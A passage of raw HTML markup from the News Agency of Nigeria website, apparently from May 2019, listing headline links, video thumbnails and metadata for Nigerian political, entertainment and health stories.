https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers.jpg 650w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="small-12 medium-8 column last"> <div class="meta default-meta side"> <span class="category xt-post-category"> <a href="https://www.nan.ng/headlines/" title="View all posts in headlines"><span itemprop="articleSection">headlines</span></a> </span> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="PDP, Atiku sabotaging Buhari&#8217;s government" target="_self" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/">PDP, Atiku sabotaging Buhari&#8217;s government</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:29:57+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:29:57+01:00"> </div> </div> </li> <li class=" show-thumbs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 medium-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/nass-inaugurates-new-media-forum/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-165x110.jpg" class="attachment-xt-small wp-post-image" alt="President of the National Assembly New Media Forum Yemi Itodo speaking during the inauguration" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-300x199.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-768x510.jpg 768w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-1024x680.jpg 1024w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-e1557955151658.jpg 700w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="small-12 medium-8 column last"> <div class="meta default-meta side"> <span class="category xt-post-category"> <a href="https://www.nan.ng/news/" title="View all posts in News"><span itemprop="articleSection">News</span></a> </span> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="NASS inaugurates New Media Forum, Yemi Itodo as President" target="_self" href="https://www.nan.ng/news/nass-inaugurates-new-media-forum/">NASS inaugurates New Media Forum, Yemi Itodo as President</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:31:25+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:31:25+01:00"> </div> </div> </li> <li class=" show-thumbs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 medium-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/obasanjo-demystified-by-buharis-victory-lagos-oba/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--165x110.jpg" class="attachment-xt-small wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--300x200.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa-.jpg 620w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="small-12 medium-8 column last"> <div class="meta default-meta side"> <span class="category xt-post-category"> <a href="https://www.nan.ng/news/" title="View all posts in News"><span itemprop="articleSection">News</span></a> </span> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba" target="_self" href="https://www.nan.ng/news/obasanjo-demystified-by-buharis-victory-lagos-oba/">Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:53:29+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:53:29+01:00"> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div><div class="vc_row wpb_row white-text vc_custom_1472317630989 full-width vc-has-background"> <div class="vc_col-sm-12 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_row wpb_row vc_inner vc_custom_1472318420160 in-container"> <div class="vc_col-sm-12 wpb_column vc_column_container vc_custom_1473514729957"> <div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <h3><span style="color: #ffffff;">NAN TV</span></h3> </div> </div> </div> </div> </div><div class="vc_row wpb_row vc_inner vc_custom_1472318420160 in-container"> <div class="vc_col-sm-12 wpb_column vc_column_container vc_custom_1473514729957"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget92b495270189b6e3cbdc9684c1ba0510_style" class="widget-instance-style" scoped> #xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title,#xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title > a{font-size:18px;line-height:22px;}#xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title:not(.bold),#xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title:not(.bold) > a{font-weight:600;}@media only screen and (max-width:849px){#xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title,#xtwidget92b495270189b6e3cbdc9684c1ba0510 .xt-post-title > a{font-size:18px!important;}} </style><div id="xtwidget92b495270189b6e3cbdc9684c1ba0510" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-category-over meta-options medium-block-grid-2 large-block-grid-4" > <li class="post-123136 post type-post status-publish format-video has-post-thumbnail hentry category-entertainment post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/entertainment/video-tonto-dikeh-opens-up-on-yahoo-boy-ex-husband-churchill/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/05/CDFA30CA-BAAB-412A-8258-CEF132AE5BC7-480x320.jpeg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/entertainment/video-tonto-dikeh-opens-up-on-yahoo-boy-ex-husband-churchill/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/CDFA30CA-BAAB-412A-8258-CEF132AE5BC7-480x320.jpeg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/CDFA30CA-BAAB-412A-8258-CEF132AE5BC7-480x320.jpeg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/05/CDFA30CA-BAAB-412A-8258-CEF132AE5BC7-165x110.jpeg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/CDFA30CA-BAAB-412A-8258-CEF132AE5BC7-270x180.jpeg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: Tonto Dikeh opens up on &#8216;Yahoo boy&#8217; ex-husband Churchill" target="_self" href="https://www.nan.ng/entertainment/video-tonto-dikeh-opens-up-on-yahoo-boy-ex-husband-churchill/">Video: Tonto Dikeh opens up on &#8216;Yahoo boy&#8217; ex-husband Churchill</a> </h4> <meta itemprop="datePublished" content="2019-05-01T16:03:34+01:00"> <meta itemprop="dateModified" content="2019-05-01T16:06:55+01:00"> </div> </div> </div> </li> <li class="post-121901 post type-post status-publish format-video has-post-thumbnail hentry category-entertainment category-news tag-easter tag-musical-drama tag-queen-moremi post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/queen-moremi-musical-coming-in-easter/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2017/01/ooni-oba-adeyeye-enitan-ogunwusi-480x320.jpeg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/queen-moremi-musical-coming-in-easter/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2017/01/ooni-oba-adeyeye-enitan-ogunwusi-480x320.jpeg" class="attachment-xt-large wp-post-image" alt="Ooni of Ife" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2017/01/ooni-oba-adeyeye-enitan-ogunwusi-480x320.jpeg 480w, https://s18694.pcdn.co/wp-content/uploads/2017/01/ooni-oba-adeyeye-enitan-ogunwusi-165x110.jpeg 165w, https://s18694.pcdn.co/wp-content/uploads/2017/01/ooni-oba-adeyeye-enitan-ogunwusi-270x180.jpeg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Queen Moremi musical coming in Easter" target="_self" href="https://www.nan.ng/news/queen-moremi-musical-coming-in-easter/">Queen Moremi musical coming in Easter</a> </h4> <meta itemprop="datePublished" content="2019-04-15T06:46:33+01:00"> <meta itemprop="dateModified" content="2019-04-15T06:46:33+01:00"> </div> </div> </div> </li> <li class="post-121822 post type-post status-publish format-video has-post-thumbnail hentry category-business category-news tag-aliko-dangote tag-mo-ibrahim post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/must-watch-aliko-dangote-mo-ibrahim-interview/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/04/5F2397D3-187B-45C1-9282-37D0692F8593-480x320.jpeg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/must-watch-aliko-dangote-mo-ibrahim-interview/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/04/5F2397D3-187B-45C1-9282-37D0692F8593-480x320.jpeg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/04/5F2397D3-187B-45C1-9282-37D0692F8593-480x320.jpeg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/04/5F2397D3-187B-45C1-9282-37D0692F8593-165x110.jpeg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/04/5F2397D3-187B-45C1-9282-37D0692F8593-270x180.jpeg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Must watch Aliko Dangote-Mo Ibrahim interview" target="_self" href="https://www.nan.ng/news/must-watch-aliko-dangote-mo-ibrahim-interview/">Must watch Aliko Dangote-Mo Ibrahim interview</a> </h4> <meta itemprop="datePublished" content="2019-04-14T08:19:41+01:00"> <meta itemprop="dateModified" content="2019-04-14T08:19:41+01:00"> </div> </div> </div> </li> <li class="post-120871 post type-post status-publish format-video has-post-thumbnail hentry category-news category-politics tag-christian-association-of-nigeria-can tag-president-muhammadu-buhari tag-rev-samson-ayokunle post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/video-saboteurs-didnt-want-us-to-congratulate-buhari-can/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/03/President-Buhari-receives-CAN-Leadership-in-Abuja-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/video-saboteurs-didnt-want-us-to-congratulate-buhari-can/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/President-Buhari-receives-CAN-Leadership-in-Abuja-480x320.jpg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/03/President-Buhari-receives-CAN-Leadership-in-Abuja-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/03/President-Buhari-receives-CAN-Leadership-in-Abuja-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/03/President-Buhari-receives-CAN-Leadership-in-Abuja-270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: Saboteurs didn’t want us to congratulate Buhari &#8211; CAN" target="_self" href="https://www.nan.ng/news/video-saboteurs-didnt-want-us-to-congratulate-buhari-can/">Video: Saboteurs didn’t want us to congratulate Buhari &#8211; CAN</a> </h4> <meta itemprop="datePublished" content="2019-03-29T22:16:29+01:00"> <meta itemprop="dateModified" content="2019-03-30T02:32:02+01:00"> </div> </div> </div> </li> <li class="post-120809 post type-post status-publish format-video has-post-thumbnail hentry category-lifestyle category-news category-politics tag-1th-bola-tinubu-colloquium-abuja tag-asiwaju-bola-ahmed-tinubu tag-national-leader-of-the-all-progressives-congress-apc tag-president-muhammadu-buhari tag-vice-president-yemi-osinbajo post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/video-buhari-osinbajo-extol-asiwaju-tinubu-at-birthday-colloquium/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/03/11th-Bola-Tinubu-Colloquium-in-Abuja-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/video-buhari-osinbajo-extol-asiwaju-tinubu-at-birthday-colloquium/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/11th-Bola-Tinubu-Colloquium-in-Abuja-480x320.jpg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/03/11th-Bola-Tinubu-Colloquium-in-Abuja-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/03/11th-Bola-Tinubu-Colloquium-in-Abuja-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/03/11th-Bola-Tinubu-Colloquium-in-Abuja-270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: Buhari, Osinbajo extol Asiwaju Tinubu at birthday colloquium" target="_self" href="https://www.nan.ng/news/video-buhari-osinbajo-extol-asiwaju-tinubu-at-birthday-colloquium/">Video: Buhari, Osinbajo extol Asiwaju Tinubu at birthday colloquium</a> </h4> <meta itemprop="datePublished" content="2019-03-28T22:35:45+01:00"> <meta itemprop="dateModified" content="2019-03-28T22:35:45+01:00"> </div> </div> </div> </li> <li class="post-120766 post type-post status-publish format-video has-post-thumbnail hentry category-metro category-news category-politics tag-federal-executive-council-fec tag-frcn tag-nan tag-nta post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/video-fec-approves-vehicles-ob-vans-transmitters-for-nta-nan-frcn/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/video-fec-approves-vehicles-ob-vans-transmitters-for-nta-nan-frcn/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-480x320.jpg" class="attachment-xt-large wp-post-image" alt="L-R; President Muhammadu Buhari, Vice President Yemi Osinbajo SAN and SGF Mr. Boss Mustapha during the Federal Executive Council Meeting (FEC) held at the Council Chambers, State House Wednesday" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-300x200.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-PRESIDES-OVER-FEC-MEETING-2.jpg 600w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: FEC approves vehicles, OB Vans, transmitters for NTA, NAN, FRCN" target="_self" href="https://www.nan.ng/news/video-fec-approves-vehicles-ob-vans-transmitters-for-nta-nan-frcn/">Video: FEC approves vehicles, OB Vans, transmitters for NTA, NAN, FRCN</a> </h4> <meta itemprop="datePublished" content="2019-03-28T00:56:35+01:00"> <meta itemprop="dateModified" content="2019-03-28T01:00:25+01:00"> </div> </div> </div> </li> <li class="post-120462 post type-post status-publish format-video has-post-thumbnail hentry category-2019-elections category-news category-politics tag-gov-nasir-el-rufai-of-kaduna-state tag-pdps-alhaji-atiku-abubakar tag-president-muhammadu-buhari post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/video-el-rufai-dismisses-atikus-claim-of-victory-in-kaduna/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-RECEIVES-KADUNA-STATE-GOV-EL-RUFAI-1-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/video-el-rufai-dismisses-atikus-claim-of-victory-in-kaduna/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-RECEIVES-KADUNA-STATE-GOV-EL-RUFAI-1-480x320.jpg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-RECEIVES-KADUNA-STATE-GOV-EL-RUFAI-1-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-RECEIVES-KADUNA-STATE-GOV-EL-RUFAI-1-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/03/PRESIDENT-BUHARI-RECEIVES-KADUNA-STATE-GOV-EL-RUFAI-1-270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: El-Rufa&#8217;i dismisses Atiku’s claim of victory in Kaduna" target="_self" href="https://www.nan.ng/news/video-el-rufai-dismisses-atikus-claim-of-victory-in-kaduna/">Video: El-Rufa&#8217;i dismisses Atiku’s claim of victory in Kaduna</a> </h4> <meta itemprop="datePublished" content="2019-03-22T21:58:23+01:00"> <meta itemprop="dateModified" content="2019-03-22T23:18:42+01:00"> </div> </div> </div> </li> <li class="post-119936 post type-post status-publish format-video has-post-thumbnail hentry category-health category-lifestyle category-news tag-2018-nigeria-hiv-aids-indicator-and-impact-survey-naiis tag-president-muhammadu-buhari post_format-post-format-video" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/video-nigeria-records-1million-less-hiv-prevalence/'" style="height:145px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/03/NACA-presents-Nigeria-HIV-AIDS-Indicator-and-Impact-Assessment-Survey-in-Abuja-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/video-nigeria-records-1million-less-hiv-prevalence/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/NACA-presents-Nigeria-HIV-AIDS-Indicator-and-Impact-Assessment-Survey-in-Abuja-480x320.jpg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/03/NACA-presents-Nigeria-HIV-AIDS-Indicator-and-Impact-Assessment-Survey-in-Abuja-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/03/NACA-presents-Nigeria-HIV-AIDS-Indicator-and-Impact-Assessment-Survey-in-Abuja-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/03/NACA-presents-Nigeria-HIV-AIDS-Indicator-and-Impact-Assessment-Survey-in-Abuja-270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-play-circle"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Video: Nigeria records 1million less HIV prevalence" target="_self" href="https://www.nan.ng/news/video-nigeria-records-1million-less-hiv-prevalence/">Video: Nigeria records 1million less HIV prevalence</a> </h4> <meta itemprop="datePublished" content="2019-03-14T22:52:48+01:00"> <meta itemprop="dateModified" content="2019-03-14T22:52:48+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div> </div> </div> </div><div class="vc_row wpb_row in-container"> <div class="vc_col-sm-3 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetcc18d52c867a88a9d3c810dd7349a789_style" class="widget-instance-style" scoped> #xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title,#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title.featured,#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title.featured > a{font-size:18px;line-height:22px;font-weight:400;}#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-excerpt.featured{font-weight:600;}@media only screen and (max-width:849px){#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title,#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title.featured,#xtwidgetcc18d52c867a88a9d3c810dd7349a789 .xt-post-title.featured > a{font-size:18px!important;}} </style><div id="xtwidgetcc18d52c867a88a9d3c810dd7349a789" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Entertainment </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/entertainment/cultural-preservation-society-tasks-media-on-folklore/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="Dr Bukar Usman, President Nigerian Folklore Society" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Cultural preservation: Society tasks media on folklore" target="_self" href="https://www.nan.ng/entertainment/cultural-preservation-society-tasks-media-on-folklore/">Cultural preservation: Society tasks media on folklore</a> </h4> <meta itemprop="datePublished" content="2019-05-16T15:48:18+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:48:18+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Britney Spears may never perform again &#8211; Manager" target="_self" href="https://www.nan.ng/entertainment/britney-spears-may-never-perform-again-manager/">Britney Spears may never perform again &#8211; Manager</a> </h4> <meta itemprop="datePublished" content="2019-05-15T13:58:16+01:00"> <meta itemprop="dateModified" content="2019-05-15T13:58:16+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Britney-Spears-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Facebook restricts live-streaming feature" target="_self" href="https://www.nan.ng/entertainment/facebook-restricts-live-streaming-feature/">Facebook restricts live-streaming feature</a> </h4> <meta itemprop="datePublished" content="2019-05-15T07:31:33+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:31:58+01:00"> <meta itemprop="image" 